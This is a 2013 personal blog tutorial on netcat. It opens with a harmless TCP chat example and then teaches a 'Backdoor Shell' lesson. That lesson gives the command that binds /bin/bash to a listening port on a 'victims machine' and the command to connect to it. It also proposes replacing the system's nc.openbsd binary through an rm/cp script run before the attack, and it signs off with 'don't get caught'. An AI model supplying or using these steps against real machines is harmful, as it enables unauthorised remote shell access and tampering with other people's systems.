Friday 20 December 2013

Introduction to Netcat


Netcat-Logo-black-500x250px.gif



Introduction : So I was messing around on the internet and came across a tool called Netcat.  I've been messing with it for a couple of days and it's some pretty cool stuff. It's really good for reverse tcp attacks as well. Anyways, let's talk about this tool.

It's called Netcat! Also known as, "The tcp/ip swiss army knife" from many sources
DOWNLOAD LINK :NETCAT

You can enter this tool in two way by typing
Code:
nc

or
Code:
netcat
Anyways here's a description of this cool little tool.




--------------------------------------------------------------------------------------------------------------------------
No need for me to rewrite what's already been written.

[Printed from Netcats man Page]

DESCRIPTION
The nc (or netcat) utility is used for just about anything under the sun involving TCP or UDP. It
can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning,
and deal with both IPv4 and IPv6. Unlike telnet(1), nc scripts nicely, and separates error messages
onto standard error instead of sending them to standard output, as telnet(1) does with some.

Common uses include:

· simple TCP proxies
· shell-script based HTTP clients and servers
· network daemon testing
· a SOCKS or HTTP ProxyCommand for ssh(1)
· and much, much more
--------------------------------------------------------------------------------------------------------------------------

Pretty cool stuff huh?! So, let's get started...

A list of all command arguments can be found in the man page:
Code:
man netcat


Lesson 1:
-----------------------------------------------------------------------------------------------------------------------
Netcat as an instant messenger
-----------------------------------------------------------------------------------------------------------------------

To get warmed up and break into this tool we are going to do a little tcp instant messenging.

First let's create the chat server:

Code:
netcat -l 8080

What we're telling netcat to listen on port 8080

-l (lower case L) = listening

and then the port number.

After that we're going to move to the other machine and type:

Code:
netcat -vv 63.233.251.218 8080

-v = Verbose -vv = double Verbose

This is going to create a connection to to the IP Address (63.233.251.218) The IP is obviously going to be the address of the machine you're connecting to, which would be the server in this case.

This is NOT Ip fyi... just a random IP Address from

http://sqa.fyicenter.com/Online_Test_Tools/Test_IP_Address_Generator.php

you should then recieve this in your terminal

Code:
Connection to 63.233.251.218 8080 port [tcp/http-alt] succeeded!

Anything you type in either terminal from machine to machine will then appear right below that.
Viola!

Lesson 2:
-----------------------------------------------------------------------------------------------------------------------
Remote Connection with Backdoor Shell aka... Hacking
-----------------------------------------------------------------------------------------------------------------------

Same thing as the first step. Start listening on the port you desire:


Code:
netcat -lvn 8080 -e /bin/bash

What this is doing is listening on port 8080 and serving shell access to whoever connects through that port.

/bin/bash is the location of the shell on linux and if it's going to be on windows cmd.exe yeah...
Note: netcat isn't installed by default on windows :P

Now we are going to connect to the victims machine on our machine doing this:

Code:
nc -vn 63.233.251.218 8080

Same Thing as before, just connecting through port 8080 on 63.233.251.218

Once the connection is successful start typing your commands in and the results will appear below like they normally would.

Now a couple things before I go!

If you're using Ubuntu this won't work! Yes, netcat is installed by default but it is revised to cancel out the -e argument. Psht Security right?! Therefore when you are on the victims machine setting up the listening connection you will have to swap out the file nc.openbsd with the traditional version. You could simply do this though. I haven't tried it yet but seems legit. Download the version including -e option and simply name that nc.openbsd and to speed up things create a bash script, prior to the attack (which I will speak about in another article), to do all of the work right away. Something like rm /bin/nc.openbsd | cp [locationofreplacement] blah blah blah.... y 'know but that's another story. It has to be nc.openbsd because the nc and netcat commands in the /bin directory both are links to the actual nc.openbsd file to probably throw you off or something.

Have fun, be safe, this is all eductional and junk. What other disclaimers and legal info on other forums, youtube videos, etc just autofill here and all that fun stuff!

Have fun, Happy hacking, don't get caught! I'll probably do other netcat tutorials, since it's such an awesome tool, once I learn more and use it more! Also other alternatives for when netcat isn't present and other cool hacks/cracks.

Cheers!

p.s. If you have any requests feel free to message me or post a comment .

No comments:

Post a Comment